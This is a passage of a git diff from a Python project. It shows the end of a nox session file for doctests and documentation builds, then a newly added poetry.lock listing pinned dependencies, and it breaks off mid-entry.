xdoctest.""" + if session.posargs: + args = [package, *session.posargs] + else: + args = [f"--modname={package}", "--command=all"] + if "FORCE_COLOR" in os.environ: + args.append("--colored=1") + + session.install(".") + session.install("xdoctest[colors]") + session.run("python", "-m", "xdoctest", *args) + + +@session(name="docs-build", python="3.10") +def docs_build(session: Session) -> None: + """Build the documentation.""" + args = session.posargs or ["docs", "docs/_build"] + if not session.posargs and "FORCE_COLOR" in os.environ: + args.insert(0, "--color") + + session.install(".") + session.install("sphinx", "sphinx-click", "furo") + + build_dir = Path("docs", "_build") + if build_dir.exists(): + shutil.rmtree(build_dir) + + session.run("sphinx-build", *args) + + +@session(python="3.10") +def docs(session: Session) -> None: + """Build and serve the documentation with live reloading on file changes.""" + args = session.posargs or ["--open-browser", "docs", "docs/_build"] + session.install(".") + session.install("sphinx", "sphinx-autobuild", "sphinx-click", "furo") + + build_dir = Path("docs", "_build") + if build_dir.exists(): + shutil.rmtree(build_dir) + + session.run("sphinx-autobuild", *args) diff --git a/poetry.lock b/poetry.lock new file mode 100644 index 0000000..4e6268f --- /dev/null +++ b/poetry.lock @@ -0,0 +1,2139 @@ +[[package]] +name = "alabaster" +version = "0.7.12" +description = "A configurable sidebar-enabled Sphinx theme" +category = "dev" +optional = false +python-versions = "*" + +[[package]] +name = "aspy.refactor-imports" +version = "2.3.0" +description = "Utilities for refactoring imports in python-like syntax." +category = "dev" +optional = false +python-versions = ">=3.7" + +[package.dependencies] +cached-property = "*" + +[[package]] +name = "atomicwrites" +version = "1.4.0" +description = "Atomic file writes." +category = "dev" +optional = false +python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*" + +[[package]] +name = "attrs" +version = "21.4.0" +description = "Classes Without Boilerplate" +category = "main" +optional = false +python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*" + +[package.extras] +dev = ["coverage[toml] (>=5.0.2)", "hypothesis", "pympler", "pytest (>=4.3.0)", "six", "mypy", "pytest-mypy-plugins", "zope.interface", "furo", "sphinx", "sphinx-notfound-page", "pre-commit", "cloudpickle"] +docs = ["furo", "sphinx", "zope.interface", "sphinx-notfound-page"] +tests = ["coverage[toml] (>=5.0.2)", "hypothesis", "pympler", "pytest (>=4.3.0)", "six", "mypy", "pytest-mypy-plugins", "zope.interface", "cloudpickle"] +tests_no_zope = ["coverage[toml] (>=5.0.2)", "hypothesis", "pympler", "pytest (>=4.3.0)", "six", "mypy", "pytest-mypy-plugins", "cloudpickle"] + +[[package]] +name = "babel" +version = "2.10.1" +description = "Internationalization utilities" +category = "dev" +optional = false +python-versions = ">=3.6" + +[package.dependencies] +pytz = ">=2015.7" + +[[package]] +name = "bandit" +version = "1.7.4" +description = "Security oriented static analyser for python code." +category = "dev" +optional = false +python-versions = ">=3.7" + +[package.dependencies] +colorama = {version = ">=0.3.9", markers = "platform_system == \"Windows\""} +GitPython = ">=1.0.1" +PyYAML = ">=5.3.1" +stevedore = ">=1.20.0" + +[package.extras] +test = ["coverage (>=4.5.4)", "fixtures (>=3.0.0)", "flake8 (>=4.0.0)", "stestr (>=2.5.0)", "testscenarios (>=0.5.0)", "testtools (>=2.3.0)", "toml", "beautifulsoup4 (>=4.8.0)", "pylint (==1.9.4)"] +toml = ["toml"] +yaml = ["pyyaml"] + +[[package]] +name = "beautifulsoup4" +version = "4.11.1" +description = "Screen-scraping library" +category = "main" +optional = false +python-versions = ">=3.6.0" + +[package.dependencies] +soupsieve = ">1.2" + +[package.extras] +html5lib = ["html5lib"] +lxml = ["lxml"] + +[[package]] +name = "black" +version = "22.3.0" +description = "The uncompromising code formatter." +category = "dev" +optional = false +python-versions = ">=3.6.2" + +[package.dependencies] +click = ">=8.0.0" +mypy-extensions = ">=0.4.3" +pathspec = ">=0.9.0" +platformdirs = ">=2" +tomli = {version = ">=1.1.0", markers = "python_version < \"3.11\""} +typed-ast = {version = ">=1.4.2", markers = "python_version < \"3.8\" and implementation_name == \"cpython\""} +typing-extensions = {version = ">=3.10.0.0", markers = "python_version < \"3.10\""} + +[package.extras] +colorama = ["colorama (>=0.4.3)"] +d = ["aiohttp (>=3.7.4)"] +jupyter = ["ipython (>=7.8.0)", "tokenize-rt (>=3.2.0)"] +uvloop = ["uvloop (>=0.15.2)"] + +[[package]] +name = "bs4" +version = "0.0.1" +description = "Dummy package for Beautiful Soup" +category = "main" +optional = false +python-versions = "*" + +[package.dependencies] +beautifulsoup4 = "*" + +[[package]] +name = "cached-property" +version = "1.5.2" +description = "A decorator for caching properties in classes." +category = "dev" +optional = false +python-versions = "*" + +[[package]] +name = "certifi" +version = "2022.5.18.1" +description = "Python package for providing Mozilla's CA Bundle." +category = "main" +optional = false +python-versions = ">=3.6" + +[[package]] +name = "cffi" +version = "1.15.0" +description = "Foreign Function Interface for Python calling C code." +category = "main" +optional = false +python-versions = "*" + +[package.dependencies] +pycparser = "*" + +[[package]] +name = "cfgv" +version = "3.3.1" +description = "Validate configuration and produce human readable error messages." +category = "dev" +optional = false +python-versions = ">=3.6.1" + +[[package]] +name = "chardet" +version = "3.0.4" +description = "Universal encoding detector for Python 2 and 3" +category = "main" +optional = false +python-versions = "*" + +[[package]] +name = "charset-normalizer" +version = "2.0.12" +description = "The Real First Universal Charset Detector. Open, modern and actively maintained alternative to Chardet." +category = "main" +optional = false +python-versions = ">=3.5.0" + +[package.extras] +unicode_backport = ["unicodedata2"] + +[[package]] +name = "click" +version = "8.1.3" +description = "Composable command line interface toolkit" +category = "main" +optional = false +python-versions = ">=3.7" + +[package.dependencies] +colorama = {version = "*", markers = "platform_system == \"Windows\""} +importlib-metadata = {version = "*", markers = "python_version < \"3.8\""} + +[[package]] +name = "colorama" +version = "0.4.4" +description = "Cross-platform colored terminal text." +category = "main" +optional = false +python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*" + +[[package]] +name = "coverage" +version = "6.4.1" +description = "Code coverage measurement for Python" +category = "dev" +optional = false +python-versions = ">=3.7" + +[package.dependencies] +tomli = {version = "*", optional = true, markers = "python_full_version <= \"3.11.0a6\" and extra == \"toml\""} + +[package.extras] +toml = ["tomli"] + +[[package]] +name = "darglint" +version = "1.8.1" +description = "A utility for ensuring Google-style docstrings stay up to date with the source code." +category = "dev" +optional = false +python-versions = ">=3.6,<4.0" + +[[package]] +name = "deprecated" +version = "1.2.13" +description = "Python @deprecated decorator to deprecate old python classes, functions or methods." +category = "main" +optional = false +python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*" + +[package.dependencies] +wrapt = ">=1.10,<2" + +[package.extras] +dev = ["tox", "bump2version (<1)", "sphinx (<2)", "importlib-metadata (<3)", "importlib-resources (<4)", "configparser (<5)", "sphinxcontrib-websupport (<2)", "zipp (<2)", "PyTest (<5)", "PyTest-Cov (<2.6)", "pytest", "pytest-cov"] + +[[package]] +name = "distlib" +version = "0.3.4" +description = "Distribution utilities" +category = "dev" +optional = false +python-versions = "*" + +[[package]] +name = "docutils" +version = "0.17.1" +description = "Docutils -- Python Documentation Utilities" +category = "dev" +optional = false +python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*" + +[[package]] +name = "dparse" +version = "0.5.1" +description = "A parser for Python dependency files" +category = "dev" +optional = false +python-versions = ">=3.5" + +[package.dependencies] +packaging = "*" +pyyaml = "*" +toml = "*" + +[package.extras] +pipenv = ["pipenv"] + +[[package]] +name = "filelock" +version = "3.7.0" +description = "A platform independent file lock." +category = "dev" +optional = false +python-versions = ">=3.7" + +[package.extras] +docs = ["furo (>=2021.8.17b43)", "sphinx (>=4.1)", "sphinx-autodoc-typehints (>=1.12)"] +testing = ["covdefaults (>=1.2.0)", "coverage (>=4)", "pytest (>=4)", "pytest-cov", "pytest-timeout (>=1.4.2)"] + +[[package]] +name = "flake8" +version = "4.0.1" +description = "the modular source code checker: pep8 pyflakes and co" +category = "dev" +optional = false +python-versions = ">=3.6" + +[package.dependencies] +importlib-metadata = {version = "<4.3", markers = "python_version < \"3.8\""} +mccabe = ">=0.6.0,<0.7.0" +pycodestyle = ">=2.8.0,<2.9.0" +pyflakes = ">=2.4.0,<2.5.0" + +[[package]] +name = "flake8-bandit" +version = "2.1.2" +description = "Automated security testing with bandit and flake8." +category = "dev" +optional = false +python-versions = "*" + +[package.dependencies] +bandit = "*" +flake8 = "*" +flake8-polyfill = "*" +pycodestyle = "*" + +[[package]] +name = "flake8-bugbear" +version = "21.11.29" +description = "A plugin for flake8 finding likely bugs and design problems in your program. Contains warnings that don't belong in pyflakes and pycodestyle." +category = "dev" +optional = false +python-versions = ">=3.6" + +[package.dependencies] +attrs = ">=19.2.0" +flake8 = ">=3.0.0" + +[package.extras] +dev = ["coverage", "hypothesis", "hypothesmith (>=0.2)", "pre-commit"] + +[[package]] +name = "flake8-docstrings" +version = "1.6.0" +description = "Extension for flake8 which uses pydocstyle to check docstrings" +category = "dev" +optional = false +python-versions = "*" + +[package.dependencies] +flake8 = ">=3" +pydocstyle = ">=2.1" + +[[package]] +name = "flake8-polyfill" +version = "1.0.2" +description = "Polyfill package for Flake8 plugins" +category = "dev" +optional = false +python-versions = "*" + +[package.dependencies] +flake8 = "*" + +[[package]] +name = "flake8-rst-docstrings" +version = "0.2.5" +description = "Python docstring reStructuredText (RST) validator" +category = "dev" +optional = false +python-versions = ">=3.6" + +[package.dependencies] +flake8 = ">=3.0.0" +pygments = "*" +restructuredtext-lint = "*" + +[[package]] +name = "furo" +version = "2022.4.7" +description = "A clean customisable Sphinx documentation theme." +category = "dev" +optional = false +python-versions = ">=3.6" + +[package.dependencies] +beautifulsoup4 = "*" +pygments = ">=2.7,<3.0" +sphinx = ">=4.0,<5.0" + +[[package]] +name = "gitdb" +version = "4.0.9" +description = "Git Object Database" +category = "dev" +optional = false +python-versions = ">=3.6" + +[package.dependencies] +smmap = ">=3.0.1,<6" + +[[package]] +name = "gitpython" +version = "3.1.27" +description = "GitPython is a python library used to interact with Git repositories" +category = "dev" +optional = false +python-versions = ">=3.7" + +[package.dependencies] +gitdb = ">=4.0.1,<5" +typing-extensions = {version = ">=3.7.4.3", markers = "python_version < \"3.8\""} + +[[package]] +name = "googletrans" +version = "3.0.0" +description = "Free Google Translate API for Python. Translates totally free of charge." +category = "main" +optional = false +python-versions = "*" + +[package.dependencies] +httpx = "0.13.3" + +[[package]] +name = "h11" +version = "0.9.0" +description = "A pure-Python, bring-your-own-I/O implementation of HTTP/1.1" +category = "main" +optional = false +python-versions = "*" + +[[package]] +name = "h2" +version = "3.2.0" +description = "HTTP/2 State-Machine based protocol implementation" +category = "main" +optional = false +python-versions = "*" + +[package.dependencies] +hpack = ">=3.0,<4" +hyperframe = ">=5.2.0,<6" + +[[package]] +name = "hpack" +version = "3.0.0" +description = "Pure-Python HPACK header compression" +category = "main" +optional = false +python-versions = "*" + +[[package]] +name = "hstspreload" +version = "2021.12.1" +description = "Chromium HSTS Preload list as a Python package" +category = "main" +optional = false +python-versions = ">=3.6" + +[[package]] +name = "httpcore" +version = "0.9.1" +description = "A minimal low-level HTTP client." +category = "main" +optional = false +python-versions = ">=3.6" + +[package.dependencies] +h11 = ">=0.8,<0.10" +h2 = ">=3.0.0,<4.0.0" +sniffio = ">=1.0.0,<2.0.0" + +[[package]] +name = "httpx" +version = "0.13.3" +description = "The next generation HTTP client." +category = "main" +optional = false +python-versions = ">=3.6" + +[package.dependencies] +certifi = "*" +chardet = ">=3.0.0,<4.0.0" +hstspreload = "*" +httpcore = ">=0.9.0,<0.10.0" +idna = ">=2.0.0,<3.0.0" +rfc3986 = ">=1.3,<2" +sniffio = "*" + +[[package]] +name = "hyperframe" +version = "5.2.0" +description = "HTTP/2 framing layer for Python" +category = "main" +optional = false +python-versions = "*" + +[[package]] +name = "identify" +version = "2.5.1" +description = "File identification library for Python" +category = "dev" +optional = false +python-versions = ">=3.7" + +[package.extras] +license = ["ukkonen"] + +[[package]] +name = "idna" +version = "2.10" +description = "Internationalized Domain Names in Applications (IDNA)" +category = "main" +optional = false +python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*" + +[[package]] +name = "imagesize" +version = "1.3.0" +description = "Getting image size from png/jpeg/jpeg2000/gif file" +category = "dev" +optional = false +python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*" + +[[package]] +name = "importlib-metadata" +version = "3.7.3" +description = "Read metadata from Python packages" +category = "main" +optional = false +python-versions = ">=3.6" + +[package.dependencies] +typing-extensions = {version = ">=3.6.4", markers = "python_version < \"3.8\""} +zipp = ">=0.5" + +[package.extras] +docs = ["sphinx", "jaraco.packaging (>=8.2)", "rst.linker (>=1.9)"] +testing = ["pytest (>=3.5,!=3.7.3)", "pytest-checkdocs (>=1.2.3)", "pytest-flake8", "pytest-cov", "pytest-enabler", "packaging", "pep517", "pyfakefs", "flufl.flake8", "pytest-black (>=0.3.7)", "pytest-mypy", "importlib-resources (>=1.3)"] + +[[package]] +name = "iniconfig" +version = "1.1.1" +description = "iniconfig: brain-dead simple config-ini parsing" +category = "dev" +optional = false +python-versions = "*" + +[[package]] +name = "jinja2" +version = "3.1.2" +description = "A very fast and expressive template engine." +category = "dev" +optional = false +python-versions = ">=3.7" + +[package.dependencies] +MarkupSafe = ">=2.0" + +[package.extras] +i18n = ["Babel (>=2.7)"] + +[[package]] +name = "livereload" +version = "2.6.3" +description = "Python LiveReload is an awesome tool for web developers" +category = "dev" +optional = false +python-versions = "*" + +[package.dependencies] +six = "*" +tornado = {version = "*", markers = "python_version > \"2.7\""} + +[[package]] +name = "markdown" +version = "3.3.5" +description = "Python implementation of Markdown." +category = "main" +optional = false +python-versions = ">=3.6" + +[package.extras] +testing = ["coverage", "pyyaml"] + +[[package]] +name = "markupsafe" +version = "2.1.1" +description = "Safely add untrusted strings to HTML/XML markup." +category = "dev" +optional = false +python-versions = ">=3.7" + +[[package]] +name = "mccabe" +version = "0.6.1" +description = "McCabe checker, plugin for flake8" +category = "dev" +optional = false +python-versions = "*" + +[[package]] +name = "mypy" +version = "0.910" +description = "Optional static typing for Python" +category = "dev" +optional = false +python-versions = ">=3.5" + +[package.dependencies] +mypy-extensions = ">=0.4.3,<0.5.0" +toml = "*" +typed-ast = {version = ">=1.4.0,<1.5.0", markers = "python_version < \"3.8\""} +typing-extensions = ">=3.7.4" + +[package.extras] +dmypy = ["psutil (>=4.0)"] +python2 = ["typed-ast (>=1.4.0,<1.5.0)"] + +[[package]] +name = "mypy-extensions" +version = "0.4.3" +description = "Experimental type system extensions for programs checked with the mypy typechecker." +category = "dev" +optional = false +python-versions = "*" + +[[package]] +name = "nodeenv" +version = "1.6.0" +description = "Node.js virtual environment builder" +category = "dev" +optional = false +python-versions = "*" + +[[package]] +name = "packaging" +version = "21.3" +description = "Core utilities for Python packages" +category = "dev" +optional = false +python-versions = ">=3.6" + +[package.dependencies] +pyparsing = ">=2.0.2,<3.0.5 || >3.0.5" + +[[package]] +name = "pathspec" +version = "0.9.0" +description = "Utility library for gitignore style pattern matching of file paths." +category = "dev" +optional = false +python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,>=2.7" + +[[package]] +name = "pbr" +version = "5.9.0" +description = "Python Build Reasonableness" +category = "dev" +optional = false +python-versions = ">=2.6" + +[[package]] +name = "pep8-naming" +version = "0.12.1" +description = "Check PEP-8 naming conventions, plugin for flake8" +category = "dev" +optional = false +python-versions = "*" + +[package.dependencies] +flake8 = ">=3.9.1" +flake8-polyfill = ">=1.0.2,<2" + +[[package]] +name = "platformdirs" +version = "2.5.2" +description = "A small Python module for determining appropriate platform-specific dirs, e.g. a \"user data dir\"." +category = "dev" +optional = false +python-versions = ">=3.7" + +[package.extras] +docs = ["furo (>=2021.7.5b38)", "proselint (>=0.10.2)", "sphinx-autodoc-typehints (>=1.12)", "sphinx (>=4)"] +test = ["appdirs (==1.4.4)", "pytest-cov (>=2.7)", "pytest-mock (>=3.6)", "pytest (>=6)"] + +[[package]] +name = "pluggy" +version = "1.0.0" +description = "plugin and hook calling mechanisms for python" +category = "dev" +optional = false +python-versions = ">=3.6" + +[package.dependencies] +importlib-metadata = {version = ">=0.12", markers = "python_version < \"3.8\""} + +[package.extras] +dev = ["pre-commit", "tox"] +testing = ["pytest", "pytest-benchmark"] + +[[package]] +name = "pre-commit" +version = "2.19.0" +description = "A framework for managing and maintaining multi-language pre-commit hooks." +category = "dev" +optional = false +python-versions = ">=3.7" + +[package.dependencies] +cfgv = ">=2.0.0" +identify = ">=1.0.0" +importlib-metadata = {version = "*", markers = "python_version < \"3.8\""} +nodeenv = ">=0.11.1" +pyyaml = ">=5.1" +toml = "*" +virtualenv = ">=20.0.8" + +[[package]] +name = "pre-commit-hooks" +version = "4.2.0" +description = "Some out-of-the-box hooks for pre-commit." +category = "dev" +optional = false +python-versions = ">=3.7" + +[package.dependencies] +"ruamel.yaml" = ">=0.15" +toml = "*" + +[[package]] +name = "py" +version = "1.11.0" +description = "library with cross-python path, ini-parsing, io, code, log facilities" +category = "dev" +optional = false +python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*" + +[[package]] +name = "pycodestyle" +version = "2.8.0" +description = "Python style guide checker" +category = "dev" +optional = false +python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*" + +[[package]] +name = "pycparser" +version = "2.21" +description = "C parser in Python" +category = "main" +optional = false +python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*" + +[[package]] +name = "pydantic" +version = "1.9.1" +description = "Data validation and settings management using python type hints" +category = "main" +optional = false +python-versions = ">=3.6.1" + +[package.dependencies] +typing-extensions = ">=3.7.4.3" + +[package.extras] +dotenv = ["python-dotenv (>=0.10.4)"] +email = ["email-validator (>=1.0.3)"] + +[[package]] +name = "pydocstyle" +version = "6.1.1" +description = "Python docstring style checker" +category = "dev" +optional = false +python-versions = ">=3.6" + +[package.dependencies] +snowballstemmer = "*" + +[package.extras] +toml = ["toml"] + +[[package]] +name = "pyflakes" +version = "2.4.0" +description = "passive checker of Python programs" +category = "dev" +optional = false +python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*" + +[[package]] +name = "pygithub" +version = "1.55" +description = "Use the full Github API v3" +category = "main" +optional = false +python-versions = ">=3.6" + +[package.dependencies] +deprecated = "*" +pyjwt = ">=2.0" +pynacl = ">=1.4.0" +requests = ">=2.14.0" + +[package.extras] +integrations = ["cryptography"] + +[[package]] +name = "pygments" +version = "2.12.0" +description = "Pygments is a syntax highlighting package written in Python." +category = "dev" +optional = false +python-versions = ">=3.6" + +[[package]] +name = "pyjwt" +version = "2.4.0" +description = "JSON Web Token implementation in Python" +category = "main" +optional = false +python-versions = ">=3.6" + +[package.extras] +crypto = ["cryptography (>=3.3.1)"] +dev = ["sphinx", "sphinx-rtd-theme", "zope.interface", "cryptography (>=3.3.1)", "pytest (>=6.0.0,<7.0.0)", "coverage[toml] (==5.0.4)", "mypy", "pre-commit"] +docs = ["sphinx", "sphinx-rtd-theme", "zope.interface"] +tests = ["pytest (>=6.0.0,<7.0.0)", "coverage[toml] (==5.0.4)"] + +[[package]] +name = "pynacl" +version = "1.5.0" +description = "Python binding to the Networking and Cryptography (NaCl) library" +category = "main" +optional = false +python-versions = ">=3.6" + +[package.dependencies] +cffi = ">=1.4.1" + +[package.extras] +docs = ["sphinx (>=1.6.5)", "sphinx-rtd-theme"] +tests = ["pytest (>=3.2.1,!=3.3.0)", "hypothesis (>=3.27.0)"] + +[[package]] +name = "pyparsing" +version = "3.0.9" +description = "pyparsing module - Classes and methods to define and execute parsing grammars" +category = "dev" +optional = false +python-versions = ">=3.6.8" + +[package.extras] +diagrams = ["railroad-diagrams", "jinja2"] + +[[package]] +name = "pytest" +version = "7.1.2" +description = "pytest: simple powerful testing with Python" +category = "dev" +optional = false +python-versions = ">=3.7" + +[package.dependencies] +atomicwrites = {version = ">=1.0", markers = "sys_platform == \"win32\""} +attrs = ">=19.2.0" +colorama = {version = "*", markers = "sys_platform == \"win32\""} +importlib-metadata = {version = ">=0.12", markers = "python_version < \"3.8\""} +iniconfig = "*" +packaging = "*" +pluggy = ">=0.12,<2.0" +py = ">=1.8.2" +tomli = ">=1.0.0" + +[package.extras] +testing = ["argcomplete", "hypothesis (>=3.56)", "mock", "nose", "pygments (>=2.7.2)", "requests", "xmlschema"] + +[[package]] +name = "pytz" +version = "2022.1" +description = "World timezone definitions, modern and historical" +category = "dev" +optional = false +python-versions = "*" + +[[package]] +name = "pyupgrade" +version = "2.32.1" +description = "A tool to automatically upgrade syntax for newer versions." +category = "dev" +optional = false +python-versions = ">=3.7" + +[package.dependencies] +tokenize-rt = ">=3.2.0" + +[[package]] +name = "pyyaml" +version = "6.0" +description = "YAML parser and emitter for Python" +category = "main" +optional = false +python-versions = ">=3.6" + +[[package]] +name = "reorder-python-imports" +version = "2.8.0" +description = "Tool for reordering python imports" +category = "dev" +optional = false +python-versions = ">=3.7" + +[package.dependencies] +"aspy.refactor-imports" = ">=2.3.0,<3" + +[[package]] +name = "requests" +version = "2.28.0" +description = "Python HTTP for Humans." +category = "main" +optional = false +python-versions = ">=3.7, <4" + +[package.dependencies] +certifi = ">=2017.4.17" +charset-normalizer = ">=2.0.0,<2.1.0" +idna = ">=2.5,<4" +urllib3 = ">=1.21.1,<1.27" + +[package.extras] +socks = ["PySocks (>=1.5.6,!=1.5.7)"] +use_chardet_on_py3 = ["chardet (>=3.0.2,<5)"] + +[[package]] +name = "restructuredtext-lint" +version = "1.4.0" +description = "reStructuredText linter" +category = "dev" +optional = false +python-versions = "*" + +[package.dependencies] +docutils = ">=0.11,<1.0" + +[[package]] +name = "rfc3986" +version = "1.5.0" +description = "Validating URI References per RFC 3986" +category = "main" +optional = false +python-versions = "*" + +[package.extras] +idna2008 = ["idna"] + +[[package]] +name = "ruamel.yaml" +version = "0.17.21" +description = "ruamel.yaml is a YAML parser/emitter that supports roundtrip preservation of comments, seq/map flow style, and map key order" +category = "dev" +optional = false +python-versions = ">=3" + +[package.dependencies] +"ruamel.yaml.clib" = {version = ">=0.2.6", markers = "platform_python_implementation == \"CPython\" and python_version < \"3.11\""} + +[package.extras] +docs = ["ryd"] +jinja2 = ["ruamel.yaml.jinja2 (>=0.2)"] + +[[package]] +name = "ruamel.yaml.clib" +version = "0.2.6" +description = "C version of reader, parser and emitter for ruamel.yaml derived from libyaml" +category = "dev" +optional = false +python-versions = ">=3.5" + +[[package]] +name = "safety" +version = "1.10.3" +description = "Checks installed dependencies for known vulnerabilities." +category = "dev" +optional = false +python-versions = ">=3.5" + +[package.dependencies] +Click = ">=6.0" +dparse = ">=0.5.1" +packaging = "*" +requests = "*" + +[[package]] +name = "six" +version = "1.16.0" +description = "Python 2 and 3 compatibility utilities" +category = "dev" +optional = false +python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*" + +[[package]] +name = "smmap" +version = "5.0.0" +description = "A pure Python implementation of a sliding window memory map manager" +category = "dev" +optional = false +python-versions = ">=3.6" + +[[package]] +name = "sniffio" +version = "1.2.0" +description = "Sniff out which async library your code is running under" +category = "main" +optional = false +python-versions = ">=3.5" + +[[package]] +name = "snowballstemmer" +version = "2.2.0" +description = "This package provides 29 stemmers for 28 languages generated from Snowball algorithms." +category = "dev" +optional = false +python-versions = "*" + +[[package]] +name = "soupsieve" +version = "2.3.2.post1" +description = "A modern CSS selector implementation for Beautiful Soup." +category = "main" +optional = false +python-versions = ">=3.6" + +[[package]] +name = "sphinx" +version = "4.3.2" +description = "Python documentation generator" +category = "dev" +optional = false +python-versions = ">=3.6" + +[package.dependencies] +alabaster = ">=0.7,<0.8" +babel = ">=1.3" +colorama = {version = ">=0.3.5", markers = "sys_platform == \"win32\""} +docutils = ">=0.14,<0.18" +imagesize = "*" +Jinja2 = ">=2.3" +packaging = "*" +Pygments = ">=2.0" +requests = ">=2.5.0" +snowballstemmer = ">=1.1" +sphinxcontrib-applehelp = "*" +sphinxcontrib-devhelp = "*" +sphinxcontrib-htmlhelp = ">=2.0.0" +sphinxcontrib-jsmath = "*" +sphinxcontrib-qthelp = "*" +sphinxcontrib-serializinghtml = ">=1.1.5" + +[package.extras] +docs = ["sphinxcontrib-websupport"] +lint = ["flake8 (>=3.5.0)", "isort", "mypy (>=0.920)", "docutils-stubs", "types-typed-ast", "types-pkg-resources", "types-requests"] +test = ["pytest", "pytest-cov", "html5lib", "cython", "typed-ast"] + +[[package]] +name = "sphinx-autobuild" +version = "2021.3.14" +description = "Rebuild Sphinx documentation on changes, with live-reload in the browser." +category = "dev" +optional = false +python-versions = ">=3.6" + +[package.dependencies] +colorama = "*" +livereload = "*" +sphinx = "*" + +[package.extras] +test = ["pytest", "pytest-cov"] + +[[package]] +name = "sphinx-click" +version = "3.1.0" +description = "Sphinx extension that automatically documents click applications" +category = "dev" +optional = false +python-versions = ">=3.6" + +[package.dependencies] +click = ">=7.0" +docutils = "*" +sphinx = ">=2.0" + +[[package]] +name = "sphinxcontrib-applehelp" +version = "1.0.2" +description = "sphinxcontrib-applehelp is a sphinx extension which outputs Apple help books" +category = "dev" +optional = false +python-versions = ">=3.5" + +[package.extras] +lint = ["flake8", "mypy", "docutils-stubs"] +test = ["pytest"] + +[[package]] +name = "sphinxcontrib-devhelp" +version = "1.0.2" +description = "sphinxcontrib-devhelp is a sphinx extension which outputs Devhelp document." +category = "dev" +optional = false +python-versions = ">=3.5" + +[package.extras] +lint = ["flake8", "mypy", "docutils-stubs"] +test = ["pytest"] + +[[package]] +name = "sphinxcontrib-htmlhelp" +version = "2.0.0" +description = "sphinxcontrib-htmlhelp is a sphinx extension which renders HTML help files" +category = "dev" +optional = false +python-versions = ">=3.6" + +[package.extras] +lint = ["flake8", "mypy", "docutils-stubs"] +test = ["pytest", "html5lib"] + +[[package]] +name = "sphinxcontrib-jsmath" +version = "1.0.1" +description = "A sphinx extension which renders display math in HTML via JavaScript" +category = "dev" +optional = false +python-versions = ">=3.5" + +[package.extras] +test = ["pytest", "flake8", "mypy"] + +[[package]] +name = "sphinxcontrib-qthelp" +version = "1.0.3" +description = "sphinxcontrib-qthelp is a sphinx extension which outputs QtHelp document." +category = "dev" +optional = false +python-versions = ">=3.5" + +[package.extras] +lint = ["flake8", "mypy", "docutils-stubs"] +test = ["pytest"] + +[[package]] +name = "sphinxcontrib-serializinghtml" +version = "1.1.5" +description = "sphinxcontrib-serializinghtml is a sphinx extension which outputs \"serialized\" HTML files (json and pickle)." +category = "dev" +optional = false +python-versions = ">=3.5" + +[package.extras] +lint = ["flake8", "mypy", "docutils-stubs"] +test = ["pytest"] + +[[package]] +name = "stevedore" +version = "3.5.0" +description = "Manage dynamic plugins for Python applications" +category = "dev" +optional = false +python-versions = ">=3.6" + +[package.dependencies] +importlib-metadata = {version = ">=1.7.0", markers = "python_version < \"3.8\""} +pbr = ">=2.0.0,<2.1.0 || >2.1.0" + +[[package]] +name = "tokenize-rt" +version = "4.2.1" +description = "A wrapper around the stdlib `tokenize` which roundtrips." +category = "dev" +optional = false +python-versions = ">=3.6.1" + +[[package]] +name = "toml" +version = "0.10.2" +description = "Python Library for Tom's Obvious, Minimal Language" +category = "dev" +optional = false +python-versions = ">=2.6, !=3.0.*, !=3.1.*, !=3.2.*" + +[[package]] +name = "tomli" +version = "2.0.1" +description = "A lil' TOML parser" +category = "dev" +optional = false +python-versions = ">=3.7" + +[[package]] +name = "tornado" +version = "6.1" +description = "Tornado is a Python web framework and asynchronous networking library, originally developed at FriendFeed." +category = "dev" +optional = false +python-versions = ">= 3.5" + +[[package]] +name = "typed-ast" +version = "1.4.3" +description = "a fork of Python 2 and 3 ast modules with type comment support" +category = "dev" +optional = false +python-versions = "*" + +[[package]] +name = "typeguard" +version = "2.13.3" +description = "Run-time type checker for Python" +category = "dev" +optional = false +python-versions = ">=3.5.3" + +[package.extras] +doc = ["sphinx-rtd-theme", "sphinx-autodoc-typehints (>=1.2.0)"] +test = ["pytest", "typing-extensions", "mypy"] + +[[package]] +name = "typing-extensions" +version = "4.2.0" +description = "Backported and Experimental Type Hints for Python 3.7+" +category = "main" +optional = false +python-versions = ">=3.7" + +[[package]] +name = "urllib3" +version = "1.26.9" +description = "HTTP library with thread-safe connection pooling, file post, and more." +category = "main" +optional = false +python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, <4" + +[package.extras] +brotli = ["brotlicffi (>=0.8.0)", "brotli (>=1.0.9)", "brotlipy (>=0.6.0)"] +secure = ["pyOpenSSL (>=0.14)", "cryptography (>=1.3.4)", "idna (>=2.0.0)", "certifi", "ipaddress"] +socks = ["PySocks (>=1.5.6,!=1.5.7,<2.0)"] + +[[package]] +name = "virtualenv" +version = "20.14.1" +description = "Virtual Python Environment builder" +category = "dev" +optional = false +python-versions = "!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*,>=2.7" + +[package.dependencies] +distlib = ">=0.3.1,<1" +filelock = ">=3.2,<4" +importlib-metadata = {version = ">=0.12", markers = "python_version < \"3.8\""} +platformdirs = ">=2,<3" +six = ">=1.9.0,<2" + +[package.extras] +docs = ["proselint (>=0.10.2)", "sphinx (>=3)", "sphinx-argparse (>=0.2.5)", "sphinx-rtd-theme (>=0.4.3)", "towncrier (>=21.3)"] +testing = ["coverage (>=4)", "coverage-enable-subprocess (>=1)", "flaky (>=3)", "pytest (>=4)", "pytest-env (>=0.6.2)", "pytest-freezegun (>=0.4.1)", "pytest-mock (>=2)", "pytest-randomly 